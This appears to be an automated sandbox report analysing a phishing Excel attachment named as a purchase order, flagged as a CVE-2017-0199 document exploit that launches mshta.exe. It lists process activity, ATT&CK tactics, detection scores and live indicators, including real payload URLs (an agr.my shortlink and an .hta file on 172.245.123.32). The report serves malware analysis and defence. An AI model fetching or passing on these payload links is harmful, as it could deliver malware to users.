Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: PURCHASE ORDER 517-2025.xla.xlsxOLE indicator, VBA macros: true
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'MBD001A3106/\x1Ole' : https://agr.my/vJcD8F?&silk=enthusiasticm=V&2G"aFzBv+\7dcUkO{u,8K| sf'.Q\R<eJ1rlmdht!c<%)Fw`7^6eLLyklcWgQbVIv9OQFIJt6VUMHZGTpa4tV5k0bivr6OqxyUCfDUv71OQ6Fn89wBodWoYxY3PDmNL8FqnGSiekrbLeCQx6f4EZMajhTVxArQoC9XTYtchiizBP1dO3CpAh9072utPLqr1JfjPyidRlP7a2gsgTJ25ywynXrmOKCKLE\"txQUB<z_VmkJ_
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'purchase order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER 517-2025.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{D8FC13E0-A622-4B63-B0D5-9A6942AE1FCA} - OProcSessId.datJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxVirustotal: Detection: 31%
Source: PURCHASE ORDER 517-2025.xla.xlsxReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxStatic file information: File size 1064448 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'MBD001A3105/Package' entropy: 7.99329796897 (max. 8.0)
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'Workbook' entropy: 7.99208997378 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 978Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649448 Sample: PURCHASE ORDER 517-2025.xla.xlsx Startdate: 26/03/2025 Architecture: WINDOWS Score: 56 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0013.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Document exploit detected (process start blacklist hit) 2->33 35 Sigma detected: Suspicious Microsoft Office Child Process 2->35 7 EXCEL.EXE 232 59 2->7         started        11 EXCEL.EXE 45 47 2->11         started        signatures3 process4 dnsIp5 25 s-part-0013.t-0009.t-msedge.net 13.107.246.41, 443, 49699, 49701 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->25 27 agr.my 147.79.86.93, 443, 49697 EKSENBILISIMTR United States 7->27 29 172.245.123.32, 49698, 80 AS-COLOCROSSINGUS United States 7->29 17 C:\...\~$PURCHASE ORDER 517-2025.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PURCHASE ORDER 517-2025.xla.xlsx31%VirustotalBrowse
PURCHASE ORDER 517-2025.xla.xlsx22%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://agr.my/vJcD8F?&silk=enthusiastic0%Avira URL Cloudsafe
http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
agr.my
147.79.86.93
truefalse
    high
    s-part-0013.t-0009.t-msedge.net
    13.107.246.41
    truefalse
      high
      s-0005.dual-s-dc-msedge.net
      52.123.130.14
      truefalse
        high
        otelrules.svc.static.microsoft
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
            high
            http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royalfalse
            • Avira URL Cloud: safe
            unknown
            https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
              high
              https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                high
                https://agr.my/vJcD8F?&silk=enthusiasticfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                147.79.86.93
                agr.myUnited States
                208485EKSENBILISIMTRfalse
                13.107.246.41
                s-part-0013.t-0009.t-msedge.netUnited States
                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                172.245.123.32
                unknownUnited States
                36352AS-COLOCROSSINGUSfalse
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1649448
                Start date and time:2025-03-26 19:46:35 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 13s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Without Instrumentation
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:PURCHASE ORDER 517-2025.xla.xlsx
                Detection:MAL
                Classification:mal56.expl.winXLSX@6/4@2/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                • Excluded IPs from analysis (whitelisted): 52.109.0.91, 23.9.183.29, 52.109.8.36, 23.210.73.5, 23.210.73.6, 104.208.16.90, 20.42.65.89, 52.123.130.14, 20.190.151.6, 20.12.23.50
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, onedscolprdcus14.centralus.cloudapp.azure.com, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsv
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                14:48:38API Interceptor1005x Sleep call for process: splwow64.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                147.79.86.93List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                  242508-02.docx.docGet hashmaliciousUnknownBrowse
                    List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                      242508-02.docx.docGet hashmaliciousUnknownBrowse
                        ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                          ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                            ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                              MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                13.107.246.41http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3DGet hashmaliciousUnknownBrowse
                                • www.eand.com/en/index.html
                                02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                • www.mvphealthcare.com/
                                02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                • www.mvphealthcare.com/
                                http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQGet hashmaliciousUnknownBrowse
                                • appcenter.ms/
                                http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3DGet hashmaliciousUnknownBrowse
                                • twiliosolutions.azurefd.net/
                                172.245.123.32givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                • 172.245.123.32/70/smss.exe
                                Bank Information.xlsGet hashmaliciousUnknownBrowse
                                • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta
                                Bank Information.xlsGet hashmaliciousUnknownBrowse
                                • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta
                                Bank Information.xlsGet hashmaliciousUnknownBrowse
                                • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                s-0005.dual-s-dc-msedge.netPricing Analysis - Ecomm and Amazon vs List.xlsxGet hashmaliciousUnknownBrowse
                                • 52.123.131.14
                                phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousUnknownBrowse
                                • 52.123.131.14
                                memebers.docGet hashmaliciousUnknownBrowse
                                • 52.123.131.14
                                PRE#U00c7O - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 52.123.130.14
                                Message.emlGet hashmaliciousUnknownBrowse
                                • 52.123.130.14
                                Message.emlGet hashmaliciousUnknownBrowse
                                • 52.123.130.14
                                Message.emlGet hashmaliciousUnknownBrowse
                                • 52.123.130.14
                                https://ecidf91-my.sharepoint.com/:o:/g/personal/coord_etudesetchantiers_org/EUmQMWGSyWxJn1UxHBfM5-0BIQy5Pwz-5xitaPNPxYfBxQ?rtime=HcHK-dRm3UgGet hashmaliciousUnknownBrowse
                                • 52.123.131.14
                                s-part-0013.t-0009.t-msedge.netPricing Analysis - Ecomm and Amazon vs List.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                python312.dllGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                https://www.flugger.pl/Get hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                https://www.flugger.plGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                • 13.107.246.41
                                hmm_dec.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                https://blackearthpavement-my.sharepoint.com/:f:/p/justin/Ers-Js2n9AROj9DUuizyNWABOVK5z1CJ653Ryc0SphjDRg?e=3ZQaIFGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                http://adf-ask-accessibility-daeeafembaazdzfk.z01.azurefd.netGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                agr.myList_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
